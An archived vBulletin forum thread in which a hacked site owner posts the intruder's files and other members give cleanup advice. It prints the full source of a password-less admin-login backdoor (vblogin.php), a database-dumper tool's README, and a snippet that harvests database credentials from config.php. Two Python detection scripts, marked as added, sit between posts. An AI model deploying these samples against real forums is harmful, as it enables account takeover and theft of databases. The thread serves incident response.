vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vB4 General Discussions (https://vborg.vbsupport.ru/forumdisplay.php?f=251)
-   -   vBulletin hack with vblogin.php (https://vborg.vbsupport.ru/showthread.php?t=315275)

Muhammad Rahman 11-06-2014 07:42 AM

vBulletin hack with vblogin.php
 
Check this post: https://theadminzone.com/threads/vbu...2/#post-932481

Dave 11-06-2014 07:47 AM

What is the question?

Muhammad Rahman 11-06-2014 07:53 AM

Quote:

Originally Posted by Dave (Post 2521586)
What is the question?

Only sharing information.
A hacker dumped the database. Check my post at The Admin Zone.

ozzy47 11-06-2014 09:30 AM

Well the post is deleted or hidden there, so we know nothing.

Muhammad Rahman 11-06-2014 09:47 AM

1 Attachment(s)
OK.
This is the script vblogin.php:

PHP Code:

<?php

require_once('./global.php');
define('SELF'$_SERVER['PHP_SELF']);

function 
verify_authentication2($username)
{
    global 
$vbulletin;

    
$username strip_blank_ascii($username' ');
    
$charset strtolower(vB_Template_Runtime::fetchStyleVar('charset')) == 'iso-8859-1' 'windows-1252' vB_Template_Runtime::fetchStyleVar('charset');
    
$username preg_replace(
        
'/&#([0-9]+);/ie',
        
"convert_unicode_char_to_charset('\\1', '$charset')",
        
$username
    
);

    if (
$vbulletin->userinfo $vbulletin->db->query_first("SELECT userid, usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " TABLE_PREFIX "user WHERE username = '" $vbulletin->db->escape_string(htmlspecialchars_uni($username)) . "'"))
    {
        
set_authentication_cookies($cookieuser);

        
$return_value true;
        (
$hook vBulletinHook::fetch_hook('login_verify_success')) ? eval($hook) : false;
        return 
$return_value;
    }

    
$return_value false;
    (
$hook vBulletinHook::fetch_hook('login_verify_failure_username')) ? eval($hook) : false;
    return 
$return_value;
}

$guess = array();
$known = array(
    
'archive',
    
'clientscript',
    
'cpstyles',
    
'customavatars',
    
'customgroupicons',
    
'customprofilepics',
    
'attach',
    
'forumrunner',
    
'images',
    
'includes',
    
'install',
    
'packages',
    
'signaturepics',
    
'store_sitemap',
    
'vb'
);
$admindir $vbulletin->config['Misc']['admincpdir'];
$complete $vbulletin->options['bburl'] . '/' $admindir '/index.php';
$results scandir('.');

foreach (
$results as $result) {
    if (
$result == '.' or $result == '..') continue;

    if (
is_dir('./' $result)) {
        if(
in_array($result$known)) continue;
        if(@
file_exists($result '/adminlog.php'))
        {
            
$guess[] = $result;
        } else {
            continue;
        }
    }
}

if(isset(
$_GET['do']) && $_GET['do'] == 'login' && isset($_GET['username']))
{
    require_once(
DIR '/includes/functions_login.php');
    
    
$username $_GET['username'];
    
$q "SELECT username FROM " TABLE_PREFIX "user WHERE username = '" $vbulletin->db->escape_string($username) . "' OR userid = '" $vbulletin->db->escape_string($username) . "'";
    
$query $vbulletin->db->query_first($q);
    if(
$query['username'] != null)
    {
        if(
verify_authentication2($query['username']))
        {
            
exec_unstrike_user($query['username']);
            
            
process_new_login('cplogin'truenull);
            
            
do_login_redirect();
        }
        else
        {
            die(
'Verify failed');
        }
    }
    else
    {
        die(
'User not found.');
    }
} else {
?>
<h1>vBulletin Login  | CP Login</h1>
<hr />
<form action="<?php echo SELF?>" method="get">
    <input type="hidden" name="do" value="login" />
    <input type="text" name="username" value="" />
    <input type="submit" name="login" value="Login as user" />
</form>
<hr />
<p>AdminCP directory detected in config: <a href="<?php echo $complete?>" target="_blank"><?php echo $complete?></a></p>
<p>Possible AdminCP directories (from existing subdirectories minus vBulletin standard): <?php foreach($guess as $dir) { echo '<a href="' $vbulletin->options['bburl'] . '/' $dir '/index.php" target="_blank">' $dir '</a> '; }?></p>
<hr />
<p>Table prefix: <?php echo TABLE_PREFIX?></P>
<p>Cookie prefix: <?php echo COOKIE_PREFIX?></P>
<p>Cookie salt: <?php echo COOKIE_SALT?></P>
<hr />
<?php
}

?>

Code:

                      __---__
                  _-      _--______
              __--( /    \ )XXXXXXXXXXXXX_
            --XXX(  O  O  )XXXXXXXXXXXXXXX-
          /XXX(      U    )        XXXXXXX\
        /XXXXX(              )--_  XXXXXXXXXXX\
        /XXXXX/ (      O    )  XXXXXX  \XXXXX\
        XXXXX/  /            XXXXXX  \__ \XXXXX----
        XXXXXX__/          XXXXXX        \__----  -
---___  XXX__/          XXXXXX      \__        ---
  --  --__/  ___/\  XXXXXX            /  ___---=
    -_    ___/    XXXXXX              '--- XXXXXX
      --\/XXX\ XXXXXX                      /XXXXX
        \XXXXXXXXX                        /XXXXX/
        \XXXXXX                        _/XXXXX/
          \XXXXX--__/              __-- XXXX/
            --XXXXXXX---------------  XXXXX--
              \XXXXXXXXXXXXXXXXXXXXXXXX-
                --XXXXXXXXXXXXXXXXXX-
          * * * * * who ya gonna call? * * * * *
                 
MySQL Dumper v2.1 Copyright © 2013

How to use:
Unzip the file in a writeable directory.
Go to /msd/install.php
It may find vBulletin config information and fill the form out automatically. If not enter it manually.
Click install and enjoy.

This uses a staggered dump process to dump larger databases.
I have been able to dump a 2GB database just fine with this.
As far as my testing goes it should dump most DB's with ease.
There are a lot of variables that go into a server, therefore I can not gurantee your experience will be the same.
The script may timeout for you. I think that it should work well for the most part.
If you have any problems with it or suggestions you can Jabber me: plumm@jabber.org or find me at http://byteoverflow.net.

Some features:
Dump DB
Drop DB
View tables in DB
Dump single table
Drop table
Prune table (TRUNCATE)
Insert row into table
Explore inside of table
Delete row in table
Edit row in table
Search table
vBulletin hash dumper
Install script (install.php)
Will search for possible vB config files and fill the install form out automatically if found.

Please keep this text file in the folder and visit: http://byteoverflow.net.

Updates in 2.1:
Staggered compression for bigger DB's and tables. The script shouldn't time out now when compressing a larger DB. Compresses 50 MB of data at a time.
Edited CSS
Just edited a few other things.


I hope you all enjoy this tool, Plum

and these two attachments, msd.zip and msd1.zip.

I hope someone can explain how this script works.

ozzy47 11-06-2014 09:49 AM

Well you may have been hacked somehow.

Please read the following two blog posts:
http://www.vbulletin.com/forum/blogs...ve-been-hacked
http://www.vbulletin.com/forum/blogs...vbulletin-site

Dave 11-06-2014 09:50 AM

It's just a script which has some code copied from the real login.php file. After a successful login it redirects you to the admincp.

The second script is a database dumper.
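The two scripts Dave describes leave a recognisable trail in the web server's access log: a GET to vblogin.php carrying do=login and a username (the form sends it by GET), followed by a hit on the admincp, and later requests under the msd/ directory. This added triage script (not from the thread or from vBulletin) parses Apache combined-format lines and flags those requests; the log lines, IPs and paths are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample in Apache "combined" format; addresses and paths are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [06/Nov/2014:03:12:41 +0000] "GET /forum/showthread.php?t=123 HTTP/1.1" 200 18342 "-" "Mozilla/5.0"
203.0.113.9 - - [06/Nov/2014:03:15:02 +0000] "GET /forum/vblogin.php HTTP/1.1" 200 1121 "-" "Mozilla/5.0"
203.0.113.9 - - [06/Nov/2014:03:15:20 +0000] "GET /forum/vblogin.php?do=login&username=admin&login=Login+as+user HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.9 - - [06/Nov/2014:03:15:21 +0000] "GET /forum/admincp/index.php HTTP/1.1" 200 9876 "-" "Mozilla/5.0"
203.0.113.9 - - [06/Nov/2014:03:20:44 +0000] "GET /forum/msd/install.php HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
203.0.113.5 - - [06/Nov/2014:03:21:00 +0000] "POST /forum/login.php?do=login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# ip, ident, user, [timestamp], "METHOD target PROTO", status ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify(target):
    """Return (reason, username) for a request target, or (None, None) if benign."""
    parts = urlsplit(target)
    path = parts.path.lower()
    base = path.rsplit('/', 1)[-1]
    qs = parse_qs(parts.query)          # decodes percent-escapes and '+' for us
    if base == 'vblogin.php':
        # The backdoor form submits do=login&username=... by GET, no password.
        if qs.get('do') == ['login'] and 'username' in qs:
            return 'vblogin.php password-less login attempt', qs['username'][0]
        return 'vblogin.php backdoor form loaded', None
    if '/msd/' in path or path.endswith('/msd'):
        return 'MySQL Dumper (msd) access', None
    return None, None


def triage(log_text):
    """Scan combined-format log text; return one finding dict per suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                    # skip lines that are not combined format
        reason, username = classify(m.group('target'))
        if reason is None:
            continue
        findings.append({
            'ip': m.group('ip'),
            'time': m.group('ts'),
            'status': int(m.group('status')),
            'target': m.group('target'),
            'reason': reason,
            'username': username,
        })
    return findings


def by_ip(findings):
    """Count suspicious requests per client address (the source to look for elsewhere)."""
    counts = defaultdict(int)
    for f in findings:
        counts[f['ip']] += 1
    return dict(counts)


if __name__ == '__main__':
    for f in triage(SAMPLE_LOG):
        print(f['time'], f['ip'], f['status'], f['reason'], f['username'] or '', f['target'])
    print(by_ip(triage(SAMPLE_LOG)))
```

Run it over the real access_log instead of SAMPLE_LOG; a 302 on the vblogin.php login request is the redirect to the admincp that Dave mentions.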

Muhammad Rahman 11-06-2014 09:56 AM

Quote:

Originally Posted by ozzy47 (Post 2521602)
Well you may have been hacked somehow.

Please read the following two blog posts:
http://www.vbulletin.com/forum/blogs...ve-been-hacked
http://www.vbulletin.com/forum/blogs...vbulletin-site

ok. thanks :)

Quote:

Originally Posted by Dave (Post 2521603)
It's just a script which has some code copied from the real login.php file. After a successful login it redirects you to the admincp.

The second script is a database dumper.

But how can a hacker upload it to the server?

ozzy47 11-06-2014 09:57 AM

Quote:

Originally Posted by Muhammad Rahman (Post 2521604)
But how can a hacker upload it to the server?

Gonna be almost impossible to tell how they did it. Best thing to do is clean up everything, and secure the site/server.

Muhammad Rahman 11-06-2014 10:02 AM

Quote:

Originally Posted by ozzy47 (Post 2521605)
Gonna be almost impossible to tell how they did it. Best thing to do is clean up everything, and secure the site/server.

The hacker tries to find config.php:

PHP Code:

$root_path CleanDir($_SERVER['DOCUMENT_ROOT']);
$path1 "$root_path/includes/config.php";
$path2 "$root_path/forum/includes/config.php";
$path3 "$root_path/forums/includes/config.php";
$path4 "$root_path/foro/includes/config.php";
$path5 "$root_path/foros/includes/config.php";
$path6 "$root_path/board/includes/config.php";
$path7 "$root_path/community/includes/config.php";
$path8 "$root_path/vb/includes/config.php";
$path9 "$root_path/vbulletin/includes/config.php";
if (
file_exists($path1)) {
    include (
$path1);
    
$confighost $config['MasterServer']['servername'];
    
$configuser $config['MasterServer']['username'];
    
$configpassword $config['MasterServer']['password'];
    
$configport $config['MasterServer']['port'];
    echo 
"<center><b><font color='green'>vB config information found!</font></b></center>";
} elseif (
file_exists($path2)) {
    include (
$path2);
    
$confighost $config['MasterServer']['servername'];
    
$configuser $config['MasterServer']['username'];
    
$configpassword $config['MasterServer']['password'];
    
$configport $config['MasterServer']['port'];
    echo 
"<center><b><font color='green'>vB config information found!</font></b></center>";
} elseif (
file_exists($path3)) {
    include (
$path3);
    
$confighost $config['MasterServer']['servername'];
    
$configuser $config['MasterServer']['username'];
    
$configpassword $config['MasterServer']['password'];
    
$configport $config['MasterServer']['port'];
    echo 
"<center><b><font color='green'>vB config information found!</font></b></center>";
} elseif (
file_exists($path4)) {
    include (
$path4);
    
$confighost $config['MasterServer']['servername'];
    
$configuser $config['MasterServer']['username'];
    
$configpassword $config['MasterServer']['password'];
    
$configport $config['MasterServer']['port'];
    echo 
"<center><b><font color='green'>vB config information found!</font></b></center>";
} elseif (
file_exists($path5)) {
    include (
$path5);
    
$confighost $config['MasterServer']['servername'];
    
$configuser $config['MasterServer']['username'];
    
$configpassword $config['MasterServer']['password'];
    
$configport $config['MasterServer']['port'];
    echo 
"<center><b><font color='green'>vB config information found!</font></b></center>";
} elseif (
file_exists($path6)) {
    include (
$path6);
    
$confighost $config['MasterServer']['servername'];
    
$configuser $config['MasterServer']['username'];
    
$configpassword $config['MasterServer']['password'];
    
$configport $config['MasterServer']['port'];
    echo 
"<center><b><font color='green'>vB config information found!</font></b></center>";
} elseif (
file_exists($path7)) {
    include (
$path7);
    
$confighost $config['MasterServer']['servername'];
    
$configuser $config['MasterServer']['username'];
    
$configpassword $config['MasterServer']['password'];
    
$configport $config['MasterServer']['port'];
    echo 
"<center><b><font color='green'>vB config information found!</font></b></center>";
} elseif (
file_exists($path8)) {
    include (
$path8);
    
$confighost $config['MasterServer']['servername'];
    
$configuser $config['MasterServer']['username'];
    
$configpassword $config['MasterServer']['password'];
    
$configport $config['MasterServer']['port'];
    echo 
"<center><b><font color='green'>vB config information found!</font></b></center>";
} elseif (
file_exists($path9)) {
    include (
$path9);
    
$confighost $config['MasterServer']['servername'];
    
$configuser $config['MasterServer']['username'];
    
$configpassword $config['MasterServer']['password'];
    
$configport $config['MasterServer']['port'];
    echo 
"<center><b><font color='green'>vB config information found!</font></b></center>";
} else {
    
$confighost "localhost";
    
$configuser "";
    
$configpassword "";
    
$configport "3306";
    echo 
"<center><b><font color='red'>No vB config information found!</font></b></center>";


Thanks for the information :)

Dave 11-06-2014 10:20 AM

It's hard to know how someone gained access to your server without having access to your vBulletin forum/logs.

Anything is possible such as: shared webhost breach, insecure vBulletin plugins, bad vBulletin configuration, other vulnerable software hosted on the server, etc.

You could start out by posting all of your plugins here.

Muhammad Rahman 11-06-2014 10:53 AM

Quote:

Originally Posted by Dave (Post 2521607)
It's hard to know how someone gained access to your server without having access to your vBulletin forum/logs.

Anything is possible such as: shared webhost breach, insecure vBulletin plugins, bad vBulletin configuration, other vulnerable software hosted on the server, etc.

You could start out by posting all of your plugins here.

I contacted my server host; they don't have any log of the hack. They said the hack came from a script, not from a server attack.

These are my plugins:
  1. Adam's Subscribed Thread Notifications
  2. Advanced Application Forms (INACTIVE)
  3. BT - Social Group Message Quote
  4. Change Posts Owner
  5. Chip2love.9xpro - Limit new thread/post per day
  6. First Post on all pages (INACTIVE)
  7. Forum Category Icons (Advanced)
  8. Forum Runner (INACTIVE)
  9. GeekyDesigns Default Avatar
  10. Global Threads: The Next Generation FREE by BOP5
  11. GlowHost - Spam-O-Matic
  12. Helpful Answers (INACTIVE)
  13. iTrader (INACTIVE)
  14. Limit Posts Per Day in Threads by BOP5
  15. Make Prefixes Clickable to Filter Forumdisplay
  16. Mark Thread As 'Sold'
  17. Minimum Post Count Required To Post Blog Entries
  18. Mod-Mall BB Code Spoiler
  19. More Share Options for VB4 by BOP5 Light (INACTIVE)
  20. Nested Quotes
  21. Advanced User Tagging (DBTech)
  22. DBSeo (DBTech) (INACTIVE)
  23. Panjo (INACTIVE)
  24. PB Usergroup Choice on Registration (INACTIVE)
  25. Ajax Point System
  26. PostRelease (INACTIVE)
  27. ProvB - Extra Threadfields
  28. Rotating Banner System
  29. Skimlinks Plugin (INACTIVE)
  30. Subscription Notification System
  31. Tapatalk (INACTIVE)
  32. Thread Participants - by rellect
  33. Threads Started by User in Postbit & Profile
  34. User Article Count (INACTIVE)
  35. Usergroup Allow HTML
  36. vBadvanced CMPS
  37. vBulletin Blog (INACTIVE)
  38. vBulletin CMS (INACTIVE)
  39. vFcoders - Ajax First Post Collapsable Hack (INACTIVE)
  40. View your Threads or Posts from the Navbar
  41. VSa - Sub-Forum Manager (INACTIVE)
  42. WS vBulletin Tweet Poster
  43. XenForo Style Avatars
  44. [OzzModz] Exclude Forums From Activity Stream (INACTIVE)

ozzy47 11-06-2014 10:56 AM

Do you have anything listed under ACP --> Plugins & Products --> Plugin Manager in the group Product : vBulletin?

Muhammad Rahman 11-06-2014 11:03 AM

Quote:

Originally Posted by ozzy47 (Post 2521611)
Do you have anything listed under ACP --> Plugins & Products --> Plugin Manager in the group Product : vBulletin?

Yes, only my custom mods.

Code:

ADD Fetch AVATAR URL        image_missing                [Edit] [Delete]
ADD FORUM NAV        parse_templates                [Edit] [Delete]
ADD RECENT EVENT CALENDAR        calendar_displaymonth_complete                [Edit] [Delete]
ADD RENDER FORUMLIST        forumbit_display                [Edit] [Delete]
ADD VAR FORUMDISPLAY        forumdisplay_complete                [Edit] [Delete]
ADD VAR SHOWGROUP        group_complete                [Edit] [Delete]
ADD VAR SHOWTHREAD        showthread_complete                [Edit] [Delete]
Auto display custom image when link images die in post        postbit_display_complete                [Edit] [Delete]
Avatar Header        parse_templates                [Edit] [Delete]
Avatar post lam - alif project        postbit_lite                [Edit] [Delete]
AVATAR THREAD        vba_cmps_module_recthreadsbits                [Edit] [Delete]
AVatar Thread Lam - alif Project        threadbit_display                [Edit] [Delete]
FG        activity_view_group                [Edit] [Delete]
FGD        fetch_template_complete                [Edit] [Delete]
FJB Mobile Iklan Terbaru        global_start                [Edit] [Delete]
FJB Newpost select category        parse_templates                [Edit] [Delete]
FJB_Kategori_Home        parse_templates                [Edit] [Delete]
FJB_Kategori_Navigasi        parse_templates                [Edit] [Delete]
Force Style        global_bootstrap_init_start                [Edit] [Delete]
Forum Kategori Navigasi        parse_templates                [Edit] [Delete]
Forum Newpost select category        parse_templates                [Edit] [Delete]
ghj        group_discussionbit_display_complete                [Edit] [Delete]
Kategori Sidebar        parse_templates                [Edit] [Delete]
Lintas Agama Terbaru        global_start                [Edit] [Delete]
Point Sistem Cache Template [Member info Block]        cache_templates                [Edit] [Delete]
REMOVE PREFIX Navbar        showthread_post_start                [Edit] [Delete]
SERP Date Group Discussion        group_discussionbit_display_complete                [Edit] [Delete]
SERP Date Group Message        group_messagebit_display_complete                [Edit] [Delete]
SERP Date Postbit        postbit_display_complete                [Edit] [Delete]
SERP Date Thread        threadbit_display                [Edit] [Delete]
Statistik Tab        member_build_blocks_start                [Edit] [Delete]
Tab Profile Default        member_build_blocks_start                [Edit] [Delete]
UNFORMAT        vbcms_article_populate_end                [Edit] [Delete]
ZP Event        global_start                [Edit] [Delete]
ZP Favorit Minggu Ini        global_start                [Edit] [Delete]
ZP Inspirasi Fashion        global_start                [Edit] [Delete]
ZP Recent Thread        global_start                [Edit] [Delete]


Dave 11-06-2014 11:18 AM

Check the FG, FGD, ghj and Lintas Agama Terbaru plugins because they have suspicious names which I never heard of. If unsure, post the contents of the plugins here.

Muhammad Rahman 11-06-2014 11:21 AM

Quote:

Originally Posted by Dave (Post 2521616)
Check the FG, FGD, ghj and Lintas Agama Terbaru plugins because they have suspicious names which I never heard of. If unsure, post the contents of the plugins here.

Those plugins are my own, made with unique names.

HM666 11-06-2014 03:57 PM

Have you overwritten the files with the vBulletin files downloaded from the members area? This is what you need to do to get rid of this problem for now. To my knowledge there is no vblogin.php file in the official download; it's called login.php if I remember correctly. So as said before, they modified this to use that file.

To find how they got in is a different matter. If you are running your forum on a shared server then that is more than likely how. Shared servers are just that... shared, and less secure than a VPS or dedicated server. You can try and speak with your web host and see if they have any way to tell where the attack came from. Most likely the hacker gained access to your FTP and changed/uploaded files to your site.

RichieBoy67 11-06-2014 04:03 PM

Are you using any nulled plugins? The nulled plugins for DBTech SEO are known to do this. Be sure all your plugins are licensed and up to date and that your file permissions are correct. Also make sure that you have the latest patch for your vBulletin version.

Once you find the hole you will need to change all server log ins, ftp, mysql, etc and admin logs.

TheLastSuperman 11-06-2014 05:00 PM

I saw the name Plum, he's one of the known powersurge hackers.

- You could have been hacked into long ago; are spare admin accounts present?
- Even if you have disabled a mod/plugin, the files still have the vulnerabilities present, so mods such as Tapatalk, which had a recent security exploit found, should always be updated to the most secure version or removed entirely.
- Do as HM666 mentioned and overwrite all files. After that, review the back-end and see if there are any spare admin accounts (use the usergroup manager to check for accounts with secondary usergroups assigned as well), then check the plugins via the plugin manager, as they can edit plugins after gaining access. Finally, check all files that were not overwritten, and do not skip checking your attachments folder if stored in the filesystem; I've seen them hide files there too.

TheLastSuperman 11-06-2014 05:02 PM

Quote:

Originally Posted by Muhammad Rahman (Post 2521617)
Those plugins are my own, made with unique names.

You wrote it/them? If so, check them again and be sure you coded them properly; otherwise you could have a plethora of security issues that we'll never be aware of or be able to offer assistance with. And no, do not post your code; if it's a private mod/plugin, all the better, since the code is not known. I would review it with another fellow coder or ask for assistance in the Private Coders Discussion forum.

RichieBoy67 11-06-2014 05:29 PM

Quote:

Originally Posted by TheLastSuperman (Post 2521654)
You wrote it/them? If so, check them again and be sure you coded them properly; otherwise you could have a plethora of security issues that we'll never be aware of or be able to offer assistance with. And no, do not post your code; if it's a private mod/plugin, all the better, since the code is not known. I would review it with another fellow coder or ask for assistance in the Private Coders Discussion forum.

I've seen the same hack embedded with hacked versions of DBTech SEO and vBSEO too.

I agree not to share the hack. :)

tbworld 11-06-2014 08:06 PM

Bottom line, he is probably going to have to hire someone to clean it all up and then add some isolation code with some additional tracking. If he hires the right professional he will learn a ton during the process. I would suggest paying extra to the consultant with this in mind. Find a consultant with great communication skills. Sorry you were hacked! (-- Yes, I know I changed grammatical person. --)

FYI: I do not run a business that assists others in vbulletin problems, programming or maintenance. Therefore, I am not saying this for my own benefit. :)

Muhammad Rahman 11-06-2014 08:55 PM

Quote:

Originally Posted by TheLastSuperman (Post 2521653)
I saw the name Plum, he's one of the known powersurge hackers.

- You could have been hacked into long ago; are spare admin accounts present?
- Even if you have disabled a mod/plugin, the files still have the vulnerabilities present, so mods such as Tapatalk, which had a recent security exploit found, should always be updated to the most secure version or removed entirely.
- Do as HM666 mentioned and overwrite all files. After that, review the back-end and see if there are any spare admin accounts (use the usergroup manager to check for accounts with secondary usergroups assigned as well), then check the plugins via the plugin manager, as they can edit plugins after gaining access. Finally, check all files that were not overwritten, and do not skip checking your attachments folder if stored in the filesystem; I've seen them hide files there too.

- No, this is the first time.
- Oh no! Tapatalk was not updated.
- Attachments: I have now changed back to the database system :)

The hacker deleted all .htaccess files to get access to the protected directories.

--------------- Added later (timestamp 1415314827) ---------------

Quote:

Originally Posted by RichieBoy67 (Post 2521659)
I've seen the same hack embedded with hacked versions of DBTech SEO and vBSEO too.

I agree not to share the hack. :)

So DBTech SEO is not secure?

tbworld 11-06-2014 09:16 PM

Quote:

Originally Posted by Muhammad Rahman (Post 2521687)
So DBTech SEO is not secure?

Once they have access to the root system they can hide whatever they want in the file system and the database. With a trained eye you can see how they hacked in via your logs - if you have a full set. You can sift through your logs to see what else they have changed, but depending on when you were hacked you could be at it for a while unless they used the same IP -- which they rarely do.

If you can rollback, then do so. Use a professional to add some isolation and tracking code in case you are hacked in the future and move on in your life. Plugins and modifications are always risky unless you know what you are doing. If you stay up-to-date with your modifications from Dbtech, you should be fairly safe. All software has the possibility to be hacked.

ozzy47 11-06-2014 10:19 PM

Quote:

Originally Posted by Muhammad Rahman (Post 2521687)
So DBTech SEO is not secure?

If it was a nulled mod, sure, it is not secure; if you got it from here or their site, it should be fine.

RichieBoy67 11-06-2014 10:25 PM

Yeah, DBTech mods are great. I meant a hacked/nulled version that some people try to get online so they can use it without a license. That is always asking for trouble.

If you bought it from DBtech or downloaded it here then I am sure it is something else.

Muhammad Rahman 11-06-2014 10:47 PM

Quote:

Originally Posted by ozzy47 (Post 2521694)
If it was a nulled mod, sure, it is not secure; if you got it from here or their site, it should be fine.

Quote:

Originally Posted by RichieBoy67 (Post 2521695)
Yeah, DBTech mods are great. I meant a hacked/nulled version that some people try to get online so they can use it without a license. That is always asking for trouble.

If you bought it from DBtech or downloaded it here then I am sure it is something else.

Since I use a vBulletin license, I never use nulled mods.
My hosting says the hacker injected via a script/mod to upload msd.zip, then tried to find config.php to see the database username and password, and then ran the msd script.

ozzy47 11-06-2014 10:53 PM

Well I would follow all the stuff in the blogs I linked you to in post #6 https://vborg.vbsupport.ru/showthrea...02#post2521602

HM666 11-06-2014 11:05 PM

Muhammad, when was your last backup of your site before this hack occurred? At worst you may have to revert the site to the point when it was not hacked. That is a last-ditch effort though and should only be done if nothing else can be, mainly because you would lose some data in that process, so save that option for last, but be prepared that it might come down to that.

Steps you should take:

1. Go to members.vbulletin.com, login and download the same version that you are running on the site.

2. Unzip it and upload all the vBulletin core PHP files in binary mode only. You probably won't have to upload your images, but you should check them just to be sure; sometimes these hackers will change them. So download those from your web site and check them to be sure that they are not files that are hacked (or look like they are supposed to). If the images have been hacked then upload them as well, but NOT in binary mode.

3. Go into your admincp and look on the left side column and find "Maintenance"; click it to open if it's not open and then go to "Diagnostics". Now on your right you will see "Suspect File Versions"; click the "Submit" button under it. This will give you an idea of what files have been changed, are not part of vBulletin, or are compromised. Just because it says that a file is not part of vBulletin does not mean that it's a hacked file. It may be part of a mod you are using. But if there are weird ones or ones that you really do not remember uploading, then download them to your PC desktop and check them in something like Dreamweaver or HTMLKit. You can check the code.

4. Go to "Usergroups>Usergroups Manager" Tick the drop down on the right and choose "Show All Primary Users" if you do not recognize an admin account try to delete it. If you cannot and it gives you a message about the account not being able to be changed then you will need to download your includes/config.php file and check the Undeletable Admin portion against the ID of that account in your admincp and take out the ID, save the file and upload it again. After you upload it again try to delete that admin account again.

5. Now, still in the Usergroups Manager, tick the drop down next to the Administrators and choose "Show All Secondary Users"; again, if you do not recognize the accounts, delete them. If you cannot and get an error message, then remove them from your config.php and try to delete them again.

6. Now go to "Styles & Templates" on the left side bar and click it to open if it's not already open. Click on "Style Manager". Find the style you are using on the site. Click the drop down on the right and choose "Edit Templates". Click the first button next to "All Template Groups"; it should look like this: << >>. This will show all your templates. Scroll down and when you come across one that is in red, open it and look to see if you see the hacker's code in the template. If not, cancel and move on to the next template in red. If you see the hacker's code in your template, then copy and paste all the template code into a Notepad file and save it, and then click on the template in the list and click the "Revert" button. You save the template in a Notepad file just in case there is coding that has been changed and you need it. OR... you can just create a new skin and try working within it instead, but that would mean that any template modifications that have been done due to a mod, or that you have done personally, would need to be redone. So which way you go is up to you. Once you have gone through all the templates and gotten rid of the hacker's code, if it's there, you should have been able to get rid of the hack by this point. If not...

Well, if not, then it might be in the database, which is the worst-case scenario I was discussing further up. This is where you might have to go to your last backup of the site before the hack happened.

After you get rid of the hack you will need to perform some basic things on the site to ensure that you are more secure in the future. You can find info on getting secure here: https://vborg.vbsupport.ru/showthrea...ghlight=hacked

Hope this helps, and sorry if it was long-winded or things you already knew to do.

--------------- Added later (timestamp 1415322405) ---------------

Quote:

Originally Posted by Muhammad Rahman (Post 2521697)
Since I use a vBulletin license, I never use nulled mods.
My hosting says the hacker injected via a script/mod to upload msd.zip, then tried to find config.php to see the database username and password, and then ran the msd script.

Find and delete msd.zip and everything it may have created in your files.

msd is MySQL Dumper; it's a script that will dump your entire database! It's used for backups or to physically change your database. This would need to be removed immediately.
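Steps 2 and 3 above (overwrite the core files, then run "Suspect File Versions") amount to comparing the live tree against a known-good one. This added script (not from the thread, not vBulletin's own diagnostic) does that offline: it hashes every .php and .htaccess file under a reference tree (a fresh download or the last clean backup) and under the live tree, reports modified, unknown and missing files, and flags the names seen in this thread (vblogin.php, msd.zip, an msd directory). The trees in build_demo are constructed for the example; on a real site point compare_trees at the two directories.

```python
import hashlib
import os
import tempfile

# Names from this thread that should never exist in a clean vBulletin tree.
KNOWN_BAD_NAMES = {'vblogin.php', 'msd.zip', 'msd1.zip'}
KNOWN_BAD_DIRS = {'msd'}


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, 'rb') as fh:
        for chunk in iter(lambda: fh.read(65536), b''):
            h.update(chunk)
    return h.hexdigest()


def tree_hashes(root):
    """Map relative path -> sha256 for every .php and .htaccess file under root."""
    out = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not (name.endswith('.php') or name == '.htaccess'):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, '/')
            out[rel] = sha256_file(full)
    return out


def compare_trees(clean_root, live_root):
    """Classify live files against the reference: modified, unknown, missing, flagged."""
    clean = tree_hashes(clean_root)
    live = tree_hashes(live_root)
    report = {'modified': [], 'unknown': [], 'missing': [], 'flagged': []}
    for rel, digest in sorted(live.items()):
        if rel in clean:
            if clean[rel] != digest:
                report['modified'].append(rel)      # core file changed in place
        else:
            report['unknown'].append(rel)           # not in the reference at all
        parts = rel.split('/')
        if parts[-1] in KNOWN_BAD_NAMES or any(p in KNOWN_BAD_DIRS for p in parts[:-1]):
            report['flagged'].append(rel)           # name matches this thread's IoCs
    for rel in sorted(clean):
        if rel not in live:
            report['missing'].append(rel)           # e.g. a deleted .htaccess
    return report


def build_demo():
    """Construct a tiny reference tree and a tampered live tree (made-up content)
    so the comparison can run offline; returns the report."""
    tmp = tempfile.mkdtemp()
    clean = os.path.join(tmp, 'clean')
    live = os.path.join(tmp, 'live')
    reference = {
        'index.php': "<?php require_once('./global.php');\n",
        'login.php': "<?php require_once('./includes/functions_login.php');\n",
        'includes/functions_login.php': "<?php function verify_authentication() {}\n",
        'admincp/.htaccess': "AuthType Basic\nRequire valid-user\n",
    }
    tampered = dict(reference)
    tampered['login.php'] += "/* constructed tamper marker */\n"
    del tampered['admincp/.htaccess']               # thread: .htaccess files were deleted
    tampered['vblogin.php'] = "<?php /* constructed stand-in for the backdoor */\n"
    tampered['msd/install.php'] = "<?php /* constructed stand-in for MySQL Dumper */\n"
    for root, files in ((clean, reference), (live, tampered)):
        for rel, body in files.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, 'w') as fh:
                fh.write(body)
    return compare_trees(clean, live)


if __name__ == '__main__':
    for kind, paths in build_demo().items():
        print(f'{kind:9s}', ', '.join(paths) or '-')
```

When the reference is the fresh download rather than a backup, expect includes/config.php and any mod files to show as unknown; those need the manual review HM666 describes, while flagged names can be removed outright.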

Muhammad Rahman 11-07-2014 12:06 AM

thanks HM666 ..
All files are already restored to before the site was hacked, and the msd folder is not found anymore :)

HM666 11-07-2014 12:07 AM

Quote:

Originally Posted by Muhammad Rahman (Post 2521722)
thanks HM666 ..
